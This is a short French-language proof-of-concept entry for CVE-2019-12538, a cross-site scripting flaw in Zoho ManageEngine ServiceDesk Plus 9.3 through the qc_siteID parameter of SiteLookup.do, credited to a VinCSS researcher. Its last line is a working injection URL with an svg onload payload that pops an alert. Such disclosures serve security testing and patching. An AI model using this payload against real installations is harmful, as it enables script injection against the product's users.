
Preuve de concept pour CVE-2019-12538 : vulnérabilité XSS dans Zoho ManageEngine ServiceDesk Plus 9.3 via le paramètre qc_siteID de SiteLookup.do. Inclut un payload pour les tests de sécurité.
Description de l'information : Un problème a été découvert dans Zoho ManageEngine ServiceDesk Plus 9.3. Il y a une XSS via le paramètre qc_siteID de SiteLookup.do.
Auteur : Concobe de Tarantula Team - VinCSS (membre de Vingroup)
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=